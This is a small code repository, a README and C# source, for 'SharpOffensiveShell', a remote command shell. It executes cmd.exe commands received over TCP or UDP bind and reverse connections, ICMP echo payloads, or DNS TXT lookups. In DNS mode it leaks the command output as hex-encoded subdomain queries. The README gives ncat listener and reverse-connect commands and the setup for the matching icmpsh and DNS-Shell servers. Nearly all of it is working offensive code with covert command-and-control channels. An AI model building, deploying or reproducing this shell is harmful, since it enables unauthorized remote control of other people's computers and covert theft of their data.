├── README.md └── SharpOffensiveShell.cs /README.md: -------------------------------------------------------------------------------- 1 | # SharpOffensiveShell 2 | 3 | A sort of simple shell which support multiple protocols. 4 | 5 | This project is just for improving my C# coding ability. The SharpOffsensiveShell DNS mode use the Native Windows API instead of the Nslookup command to perform DNS requests. 6 | 7 | ## QuickStart 8 | 9 | SharpOffsensiveShell support .NET Framework 2.0 10 | 11 | ``` 12 | csc SharpOffensiveShell.cs 13 | ``` 14 | 15 | ## TCP 16 | 17 | **For bind shell** 18 | 19 | ``` 20 | sharpoffensiveshell.exe tcp listen 0.0.0.0 8080 21 | ``` 22 | 23 | ``` 24 | ncat -v 1.1.1.1 8080 25 | ``` 26 | 27 | **For reverse shell** 28 | 29 | ``` 30 | ncat -lvp 8080 31 | ``` 32 | 33 | ``` 34 | sharpoffensiveshell.exe tcp connect 1.1.1.1 8080 35 | ``` 36 | 37 | ## UDP 38 | 39 | **For bind shell** 40 | 41 | ``` 42 | sharpoffensiveshell.exe tcp listen 0.0.0.0 8080 43 | ``` 44 | 45 | ``` 46 | ncat -u -v 1.1.1.1 8080 47 | ``` 48 | 49 | **For reverse shell** 50 | 51 | ``` 52 | ncat -u -lvp 8080 53 | ``` 54 | 55 | When reverse connection accepted, type enter to make prompt display. 56 | 57 | ``` 58 | sharpoffensiveshell.exe tcp connect 1.1.1.1 8080 59 | ``` 60 | 61 | ## ICMP 62 | 63 | ``` 64 | git clone https://github.com/inquisb/icmpsh 65 | sysctl -w net.ipv4.icmp_echo_ignore_all=1 66 | cd icmpsh && python icmpsh-m.py listenIP reverseConnectIP 67 | ``` 68 | 69 | ``` 70 | sharpoffensiveshell.exe icmp connect listenIP 71 | ``` 72 | 73 | ## DNS 74 | 75 | ``` 76 | pip install dnslib 77 | git clone https://github.com/sensepost/DNS-Shell 78 | ``` 79 | 80 | **For direct mode** 81 | 82 | ``` 83 | python DNS-Shell.py -l -d [Server IP] 84 | sharpoffensiveshell.exe dns direct ServerIP Domain 85 | ``` 86 | 87 | **For recursive mode** 88 | 89 | ``` 90 | DNS-Shell.py -l -r [Domain] 91 | sharpoffensiveshell.exe dns recurse Domain 92 | ``` 93 | 94 | -------------------------------------------------------------------------------- /SharpOffensiveShell.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Net; 4 | using System.Net.Sockets; 5 | using System.Net.NetworkInformation; 6 | using System.Text; 7 | //using System.Linq; 8 | using System.Runtime.InteropServices; 9 | using System.Threading; 10 | using System.Diagnostics; 11 | 12 | namespace SharpShell 13 | { 14 | class DnsClass 15 | { 16 | public enum DnsQueryOptions 17 | { 18 | DNS_QUERY_STANDARD = 0x0, 19 | DNS_QUERY_ACCEPT_TRUNCATED_RESPONSE = 0x1, 20 | DNS_QUERY_USE_TCP_ONLY = 0x2, 21 | DNS_QUERY_NO_RECURSION = 0x4, 22 | DNS_QUERY_BYPASS_CACHE = 0x8, 23 | DNS_QUERY_NO_WIRE_QUERY = 0x10, 24 | DNS_QUERY_NO_LOCAL_NAME = 0x20, 25 | DNS_QUERY_NO_HOSTS_FILE = 0x40, 26 | DNS_QUERY_NO_NETBT = 0x80, 27 | DNS_QUERY_WIRE_ONLY = 0x100, 28 | DNS_QUERY_RETURN_MESSAGE = 0x200, 29 | DNS_QUERY_MULTICAST_ONLY = 0x400, 30 | DNS_QUERY_NO_MULTICAST = 0x800, 31 | DNS_QUERY_TREAT_AS_FQDN = 0x1000, 32 | DNS_QUERY_ADDRCONFIG = 0x2000, 33 | DNS_QUERY_DUAL_ADDR = 0x4000, 34 | DNS_QUERY_MULTICAST_WAIT = 0x20000, 35 | DNS_QUERY_MULTICAST_VERIFY = 0x40000, 36 | DNS_QUERY_DONT_RESET_TTL_VALUES = 0x100000, 37 | DNS_QUERY_DISABLE_IDN_ENCODING = 0x200000, 38 | DNS_QUERY_APPEND_MULTILABEL = 0x800000, 39 | DNS_QUERY_RESERVED = unchecked((int)0xF0000000) 40 | } 41 | 42 | public enum DNS_FREE_TYPE 43 | { 44 | DnsFreeFlat = 0, 45 | DnsFreeRecordList = 1, 46 | DnsFreeParsedMessageFields = 2 47 | } 48 | 49 | public enum DnsRecordTypes 50 | { 51 | DNS_TYPE_A = 0x1, 52 | DNS_TYPE_TEXT = 0x10, 53 | DNS_TYPE_TXT = DNS_TYPE_TEXT, 54 | } 55 | 56 | [DllImport("dnsapi", EntryPoint = "DnsQuery_W", CharSet = CharSet.Unicode, SetLastError = true, ExactSpelling = true)] 57 | public static extern int DnsQuery([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrName, DnsRecordTypes wType, 58 | DnsQueryOptions Options, IntPtr pExtra, ref IntPtr ppQueryResultsSet, IntPtr pReserved); 59 | 60 | [DllImport("dnsapi", EntryPoint = "DnsQuery_W", CharSet = CharSet.Unicode, SetLastError = true, ExactSpelling = true)] 61 | public static extern int DnsQueryWithServerIp([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrName, DnsRecordTypes wType, 62 | DnsQueryOptions Options, ref IP4_ARRAY dnsServerIpArray, ref IntPtr ppQueryResultsSet, IntPtr pReserved); 63 | 64 | [DllImport("dnsapi", CharSet = CharSet.Auto, SetLastError = true)] 65 | public static extern void DnsRecordListFree(IntPtr pRecordList, DNS_FREE_TYPE FreeType); 66 | 67 | [StructLayout(LayoutKind.Sequential)] 68 | public struct DNS_A_DATA 69 | { 70 | public uint IpAddress; 71 | } 72 | 73 | [StructLayout(LayoutKind.Sequential)] 74 | public struct DNS_TXT_DATA 75 | { 76 | public uint dwStringCount; 77 | public IntPtr pStringArray; 78 | } 79 | 80 | [StructLayout(LayoutKind.Sequential)] 81 | public struct DNS_RECORD_FLAGS 82 | { 83 | internal uint data; 84 | public uint Section 85 | { 86 | get { return data & 0x3u; } 87 | set { data = (data & ~0x3u) | (value & 0x3u); } 88 | } 89 | public uint Delete 90 | { 91 | get { return (data >> 2) & 0x1u; } 92 | set { data = (data & ~(0x1u << 2)) | (value & 0x1u) << 2; } 93 | } 94 | public uint CharSet 95 | { 96 | get { return (data >> 3) & 0x3u; } 97 | set { data = (data & ~(0x3u << 3)) | (value & 0x3u) << 3; } 98 | } 99 | public uint Unused 100 | { 101 | get { return (data >> 5) & 0x7u; } 102 | set { data = (data & ~(0x7u << 5)) | (value & 0x7u) << 5; } 103 | } 104 | public uint Reserved 105 | { 106 | get { return (data >> 8) & 0xFFFFFFu; } 107 | set { data = (data & ~(0xFFFFFFu << 8)) | (value & 0xFFFFFFu) << 8; } 108 | } 109 | } 110 | 111 | [StructLayout(LayoutKind.Explicit)] 112 | public struct FlagsUnion 113 | { 114 | [FieldOffset(0)] 115 | public uint DW; 116 | [FieldOffset(0)] 117 | public DNS_RECORD_FLAGS S; 118 | } 119 | 120 | [StructLayout(LayoutKind.Explicit)] 121 | public struct DataUnion 122 | { 123 | [FieldOffset(0)] 124 | public DNS_A_DATA A; 125 | [FieldOffset(0)] 126 | public DNS_TXT_DATA HINFO, Hinfo, ISDN, Isdn, TXT, Txt, X25; 127 | } 128 | 129 | [StructLayout(LayoutKind.Explicit)] 130 | public struct DNS_RECORD 131 | { 132 | [FieldOffset(0)] 133 | public IntPtr pNext; 134 | [FieldOffset(4)] 135 | public IntPtr pName; 136 | [FieldOffset(8)] 137 | public ushort wType; 138 | [FieldOffset(10)] 139 | public ushort wDataLength; 140 | [FieldOffset(12)] 141 | public FlagsUnion Flags; 142 | [FieldOffset(16)] 143 | public uint dwTtl; 144 | [FieldOffset(20)] 145 | public uint dwReserved; 146 | [FieldOffset(24)] 147 | public DataUnion Data; 148 | } 149 | 150 | [StructLayout(LayoutKind.Sequential)] 151 | public struct IP4_ARRAY 152 | { 153 | public UInt32 AddrCount; 154 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 1, ArraySubType = UnmanagedType.U4)] 155 | public UInt32[] AddrArray; 156 | } 157 | 158 | public string DnsServerIp = ""; 159 | 160 | public static long IpToInt(string ip) 161 | { 162 | char[] separator = new char[] { '.' }; 163 | string[] items = ip.Split(separator); 164 | return long.Parse(items[0]) << 24 165 | | long.Parse(items[1]) << 16 166 | | long.Parse(items[2]) << 8 167 | | long.Parse(items[3]); 168 | } 169 | 170 | public static string IntToIp(long ipInt) 171 | { 172 | StringBuilder sb = new StringBuilder(); 173 | sb.Append((ipInt >> 24) & 0xFF).Append("."); 174 | sb.Append((ipInt >> 16) & 0xFF).Append("."); 175 | sb.Append((ipInt >> 8) & 0xFF).Append("."); 176 | sb.Append(ipInt & 0xFF); 177 | return sb.ToString(); 178 | } 179 | 180 | public List QueryA(string domain) 181 | { 182 | IntPtr recordsArray = IntPtr.Zero; 183 | try 184 | { 185 | int result = 0; 186 | if (DnsServerIp.Length == 0) 187 | { 188 | result = DnsQuery(ref domain, DnsRecordTypes.DNS_TYPE_A, DnsQueryOptions.DNS_QUERY_BYPASS_CACHE,IntPtr.Zero, ref recordsArray, IntPtr.Zero); 189 | } 190 | else 191 | { 192 | uint address = BitConverter.ToUInt32(IPAddress.Parse(DnsServerIp).GetAddressBytes(), 0); 193 | uint[] ipArray = new uint[1]; 194 | ipArray.SetValue(address, 0); 195 | IP4_ARRAY dnsServerArray = new IP4_ARRAY(); 196 | dnsServerArray.AddrCount = 1; 197 | dnsServerArray.AddrArray = new uint[1]; 198 | dnsServerArray.AddrArray[0] = address; 199 | result = DnsQueryWithServerIp(ref domain, DnsRecordTypes.DNS_TYPE_A, DnsQueryOptions.DNS_QUERY_BYPASS_CACHE, ref dnsServerArray, ref recordsArray, IntPtr.Zero); 200 | } 201 | 202 | if (result != 0) 203 | { 204 | return null; 205 | } 206 | DNS_RECORD record; 207 | List recordList = new List(); 208 | for (IntPtr recordPtr = recordsArray; !recordPtr.Equals(IntPtr.Zero); recordPtr = record.pNext) 209 | { 210 | record = (DNS_RECORD)Marshal.PtrToStructure(recordPtr, typeof(DNS_RECORD)); 211 | if (record.wType == (int)DnsRecordTypes.DNS_TYPE_A) 212 | { 213 | recordList.Add(IntToIp(record.Data.A.IpAddress)); 214 | //Console.WriteLine(IntToIp(record.Data.A.IpAddress)); 215 | } 216 | } 217 | return recordList; 218 | 219 | } 220 | finally 221 | { 222 | if (recordsArray != IntPtr.Zero) 223 | { 224 | DnsRecordListFree(recordsArray, DNS_FREE_TYPE.DnsFreeFlat); 225 | } 226 | } 227 | } 228 | 229 | public List QueryTXT(string domain) 230 | { 231 | IntPtr recordsArray = IntPtr.Zero; 232 | try 233 | { 234 | int result = 0; 235 | if (DnsServerIp.Length == 0) 236 | { 237 | result = DnsQuery(ref domain, DnsRecordTypes.DNS_TYPE_TXT, DnsQueryOptions.DNS_QUERY_BYPASS_CACHE, IntPtr.Zero, ref recordsArray, IntPtr.Zero); 238 | } 239 | else 240 | { 241 | 242 | uint address = BitConverter.ToUInt32(IPAddress.Parse(DnsServerIp).GetAddressBytes(), 0); 243 | uint[] ipArray = new uint[1]; 244 | ipArray.SetValue(address, 0); 245 | IP4_ARRAY dnsServerArray = new IP4_ARRAY(); 246 | dnsServerArray.AddrCount = 1; 247 | dnsServerArray.AddrArray = new uint[1]; 248 | dnsServerArray.AddrArray[0] = address; 249 | result = DnsQueryWithServerIp(ref domain, DnsRecordTypes.DNS_TYPE_TXT, DnsQueryOptions.DNS_QUERY_BYPASS_CACHE, ref dnsServerArray, ref recordsArray, IntPtr.Zero); 250 | } 251 | if (result != 0) 252 | { 253 | return null; 254 | } 255 | DNS_RECORD record; 256 | List recordList = new List(); 257 | for (IntPtr recordPtr = recordsArray; !recordPtr.Equals(IntPtr.Zero); recordPtr = record.pNext) 258 | { 259 | record = (DNS_RECORD)Marshal.PtrToStructure(recordPtr, typeof(DNS_RECORD)); 260 | if (record.wType == (int)DnsRecordTypes.DNS_TYPE_TXT) 261 | { 262 | recordList.Add(Marshal.PtrToStringAuto(record.Data.TXT.pStringArray)); 263 | //Console.WriteLine(Marshal.PtrToStringAuto(record.Data.TXT.pStringArray)); 264 | } 265 | } 266 | return recordList; 267 | } 268 | finally 269 | { 270 | if (recordsArray != IntPtr.Zero) 271 | { 272 | DnsRecordListFree(recordsArray, DNS_FREE_TYPE.DnsFreeFlat); 273 | } 274 | } 275 | } 276 | 277 | } 278 | 279 | class Program 280 | { 281 | static string Prompt = "Command>"; 282 | 283 | public static string RunCmd(string cmd) 284 | { 285 | string outSuccess = string.Empty; 286 | string outFail = string.Empty; 287 | if (cmd.Length > 0) 288 | { 289 | Process proc = new Process(); 290 | proc.StartInfo.FileName = "cmd.exe"; 291 | proc.StartInfo.Arguments = "/C " + cmd; 292 | proc.StartInfo.UseShellExecute = false; 293 | proc.StartInfo.RedirectStandardInput = false; 294 | proc.StartInfo.RedirectStandardOutput = true; 295 | proc.StartInfo.RedirectStandardError = true; 296 | proc.StartInfo.CreateNoWindow = true; 297 | try 298 | { 299 | if (proc.Start()) 300 | { 301 | proc.WaitForExit(10 * 1000); 302 | outSuccess = proc.StandardOutput.ReadToEnd(); 303 | outFail = proc.StandardError.ReadToEnd(); 304 | if (outSuccess.Length > 0) 305 | { 306 | return outSuccess; 307 | } 308 | else 309 | { 310 | return outFail; 311 | } 312 | 313 | } 314 | } 315 | catch (Exception ex) 316 | { 317 | outFail = proc.StandardError.ReadToEnd(); 318 | return outFail; 319 | } 320 | finally 321 | { 322 | if (!proc.HasExited) 323 | { 324 | if (!proc.Responding) 325 | { 326 | proc.Kill(); 327 | } 328 | } 329 | if (proc != null) 330 | { 331 | proc.Close(); 332 | proc.Dispose(); 333 | proc = null; 334 | } 335 | } 336 | } 337 | return "\n"; 338 | } 339 | 340 | static void TcpShell(string Action,string IPAddr,int Port) 341 | { 342 | TcpClient client = null; 343 | TcpListener server = null; 344 | if (Action == "connect") 345 | { 346 | client = new TcpClient(IPAddr, Port); 347 | } 348 | if (Action == "listen") 349 | { 350 | IPAddress localAddr = IPAddress.Parse(IPAddr); 351 | try 352 | { 353 | server = new TcpListener(localAddr, Port); 354 | server.Start(); 355 | client = server.AcceptTcpClient(); 356 | } 357 | catch (SocketException e) 358 | { 359 | Console.WriteLine("SocketException: {0}", e); 360 | return; 361 | } 362 | 363 | } 364 | 365 | NetworkStream stream = client.GetStream(); 366 | byte[] bytes = new Byte[65535]; 367 | byte[] sendbytes = System.Text.Encoding.UTF8.GetBytes(Prompt); 368 | stream.Write(sendbytes, 0, sendbytes.Length); 369 | int i = stream.Read(bytes,0,bytes.Length); 370 | while(i != 0) 371 | { 372 | ASCIIEncoding EncodedText = new System.Text.ASCIIEncoding(); 373 | string data = EncodedText.GetString(bytes, 0, i); 374 | string sendback = RunCmd(data); 375 | sendbytes = System.Text.Encoding.UTF8.GetBytes(sendback); 376 | stream.Write(sendbytes, 0, sendbytes.Length); 377 | byte[] sendbytes2 = System.Text.Encoding.UTF8.GetBytes(Prompt); 378 | stream.Write(sendbytes2, 0, sendbytes2.Length); 379 | stream.Flush(); 380 | i = stream.Read(bytes, 0, bytes.Length); 381 | } 382 | client.Close(); 383 | if (server != null) 384 | server.Stop(); 385 | } 386 | 387 | static void UdpShell(string Action, string IPAddr, int Port) 388 | { 389 | UdpClient client = null; 390 | //UdpClient server = null; 391 | IPEndPoint endpoint = new IPEndPoint(IPAddress.Parse(IPAddr), Port); 392 | ASCIIEncoding EncodedText = new System.Text.ASCIIEncoding(); 393 | if (Action == "connect") 394 | { 395 | if (IPAddr.Length > 16) 396 | { 397 | client = new UdpClient(Port, AddressFamily.InterNetworkV6); 398 | } 399 | else 400 | { 401 | client = new UdpClient(Port, AddressFamily.InterNetwork); 402 | } 403 | } 404 | if (Action == "listen") 405 | { 406 | endpoint = new IPEndPoint(IPAddress.Any, Port); 407 | if (IPAddr.Length > 16) 408 | { 409 | client = new UdpClient(Port, AddressFamily.InterNetworkV6); 410 | } 411 | else 412 | { 413 | client = new UdpClient(Port, AddressFamily.InterNetwork); 414 | } 415 | client.Receive(ref endpoint); 416 | } 417 | byte[] bytes = new Byte[65535]; 418 | byte[] sendbytes = System.Text.Encoding.UTF8.GetBytes(Prompt); 419 | client.Send(sendbytes, sendbytes.Length, endpoint); 420 | 421 | while (true) 422 | { 423 | byte[] receivebytes = client.Receive(ref endpoint); 424 | string returndata = EncodedText.GetString(receivebytes); 425 | if (returndata.ToLower() == "exit\n") 426 | break; 427 | string sendback = RunCmd(returndata); 428 | sendbytes = System.Text.Encoding.UTF8.GetBytes(sendback); 429 | client.Send(sendbytes, sendbytes.Length, endpoint); 430 | byte[] sendbytes2 = System.Text.Encoding.UTF8.GetBytes(Prompt); 431 | client.Send(sendbytes2, sendbytes2.Length, endpoint); 432 | } 433 | client.Close(); 434 | } 435 | 436 | static void IcmpShell(string IPAddr) 437 | { 438 | int Delay = 1; 439 | int BufferSize = 128; 440 | Ping pingSender = new Ping(); 441 | PingOptions options = new PingOptions(); 442 | options.DontFragment = true; 443 | 444 | 445 | byte[] PromptBuffer = Encoding.UTF8.GetBytes(Prompt); 446 | int Timeout = 60 * 1000; 447 | PingReply reply = pingSender.Send(IPAddr, Timeout, PromptBuffer, options); 448 | 449 | while (true) 450 | { 451 | byte[] EmptyBuffer = Encoding.UTF8.GetBytes(""); 452 | reply = pingSender.Send(IPAddr, Timeout, EmptyBuffer, options); 453 | if (reply.Buffer.Length > 0) 454 | { 455 | string Response = Encoding.ASCII.GetString(reply.Buffer); 456 | if (Response.ToLower() == "exit\n") 457 | break; 458 | string Result = RunCmd(Response); 459 | byte[] ResultBuffer = Encoding.UTF8.GetBytes(Result); 460 | int index = (int)Math.Floor((double)(ResultBuffer.Length / BufferSize)); 461 | int i = 0; 462 | 463 | if (ResultBuffer.Length > BufferSize) 464 | { 465 | byte[] ResultBuffer2; 466 | while (i < index) 467 | { 468 | /* only c# 3.5 can support linq */ 469 | //ResultBuffer2 = ResultBuffer.Skip(i * BufferSize).Take((i + 1) * BufferSize - i * BufferSize).ToArray(); 470 | ResultBuffer2 = new List(ResultBuffer).GetRange(i * BufferSize, (i + 1) * BufferSize - i * BufferSize).ToArray(); 471 | reply = pingSender.Send(IPAddr, Timeout, ResultBuffer2, options); 472 | i += 1; 473 | } 474 | int remainIndex = ResultBuffer.Length % BufferSize; 475 | if (remainIndex != 0) 476 | { 477 | /* only c# 3.5 can support linq */ 478 | //ResultBuffer2 = ResultBuffer.Skip(i * BufferSize).Take(ResultBuffer.Length - i * BufferSize).ToArray(); 479 | ResultBuffer2 = new List(ResultBuffer).GetRange(i * BufferSize, ResultBuffer.Length - i * BufferSize).ToArray(); 480 | reply = pingSender.Send(IPAddr, Timeout, ResultBuffer2, options); 481 | } 482 | } 483 | else 484 | { 485 | reply = pingSender.Send(IPAddr, Timeout, ResultBuffer, options); 486 | } 487 | reply = pingSender.Send(IPAddr, Timeout, PromptBuffer, options); 488 | } 489 | else 490 | { 491 | Thread.Sleep(Delay * 1000); 492 | } 493 | } 494 | } 495 | 496 | static int RandomNumber(int min, int max) 497 | { 498 | Random random = new Random(); 499 | return random.Next(min, max); 500 | } 501 | 502 | static string RandomString(int size, bool lowerCase) 503 | { 504 | StringBuilder builder = new StringBuilder(); 505 | Random random = new Random(); 506 | char ch; 507 | for (int i = 0; i < size; i++) 508 | { 509 | ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65))); 510 | builder.Append(ch); 511 | } 512 | if (lowerCase) 513 | return builder.ToString().ToLower(); 514 | return builder.ToString(); 515 | } 516 | 517 | static void DnsExec(DnsClass dnsClass,string cmd,string domain) 518 | { 519 | string result = RunCmd(cmd); 520 | byte[] sendbytes = System.Text.Encoding.UTF8.GetBytes(result); 521 | string bitString = BitConverter.ToString(sendbytes).Replace("-",""); 522 | int bitLen = bitString.Length; 523 | int split = 50; 524 | int repeat = (int)Math.Floor((double)(bitLen/split)); 525 | int remainder = bitLen % split; 526 | int repeatR = 0; 527 | if (remainder > 0) 528 | repeatR = repeat + 1; 529 | string rnd = RandomString(8, false) + ".CMDC" + repeatR.ToString() + "." + domain; 530 | dnsClass.QueryA(rnd); 531 | int i = 0; 532 | for( ; i < repeat; i++) 533 | { 534 | string subStr = bitString.Substring(i*split,split); 535 | rnd = RandomString(8, false) + ".CMD" + i.ToString() + "." + subStr + "." + domain; 536 | dnsClass.QueryA(rnd); 537 | } 538 | if( remainder > 0) 539 | { 540 | string subStr2 = bitString.Substring(bitLen - remainder); 541 | i += 1; 542 | rnd = RandomString(8, false) + ".CMD" + i.ToString() + "." + subStr2 + "." + domain; 543 | dnsClass.QueryA(rnd); 544 | } 545 | rnd = RandomString(8, false) + ".END." + domain; 546 | dnsClass.QueryA(rnd); 547 | } 548 | 549 | static void DnsShell(string Domain, string IPAddr) 550 | { 551 | DnsClass dnsClass = new DnsClass(); 552 | if (IPAddr.Length > 0) 553 | dnsClass.DnsServerIp = IPAddr; 554 | while (true) 555 | { 556 | string rnd = RandomNumber(1000,9999).ToString() + RandomString(8, false) + "." + Domain; 557 | List txtRecords = dnsClass.QueryTXT(rnd); 558 | if (txtRecords == null) 559 | continue; 560 | string responseCmd = String.Join(" ", txtRecords.ToArray()); 561 | Console.WriteLine(responseCmd); 562 | if (responseCmd.ToLower().StartsWith("nocmd") || responseCmd.Length == 0 ) 563 | continue; 564 | if (responseCmd.ToLower().StartsWith("exit")) 565 | break; 566 | DnsExec(dnsClass,responseCmd,Domain); 567 | } 568 | } 569 | 570 | 571 | static void Usage() 572 | { 573 | Console.Write(@"-= SharpShell by DarkRay =- 574 | SharpShell tcp listen 0.0.0.0 8080 575 | SharpShell tcp connect 192.168.1.1 8080 576 | SharpShell udp listen 0.0.0.0 8080 577 | SharpShell udp connect 192.168.1.1 8080 578 | SharpShell icmp connect 192.168.1.1 579 | SharpShell dns direct 192.168.1.1 test.com 580 | SharpShell dns recurse test.com 581 | "); 582 | } 583 | 584 | static void Main(string[] args) 585 | { 586 | if (args.Length == 0) 587 | { 588 | Usage(); 589 | return; 590 | } 591 | string action = args[1].ToLower() ; 592 | if (action != "connect" && action != "listen" && action != "direct" && action != "recurse") 593 | { 594 | Usage(); 595 | return; 596 | } 597 | string ip = ""; 598 | int port = 0; 599 | string mode = args[0].ToLower(); 600 | switch (mode) 601 | { 602 | case "tcp": 603 | ip = args[2]; 604 | port = Convert.ToInt32(args[3]); 605 | TcpShell(action, ip, port); 606 | break; 607 | case "udp": 608 | ip = args[2]; 609 | port = Convert.ToInt32(args[3]); 610 | UdpShell(action, ip, port); 611 | break; 612 | case "icmp": 613 | if (args.Length == 3) 614 | { 615 | ip = args[2]; 616 | IcmpShell(ip); 617 | } 618 | break; 619 | case "dns": 620 | string domain = ""; 621 | if (action == "direct") 622 | { 623 | ip = args[2]; 624 | domain = args[3]; 625 | DnsShell(domain, ip); 626 | } 627 | if (action == "recurse") 628 | { 629 | domain = args[2]; 630 | DnsShell(domain, ""); 631 | } 632 | break; 633 | default: 634 | Usage(); 635 | break; 636 | } 637 | } 638 | } 639 | } 640 | --------------------------------------------------------------------------------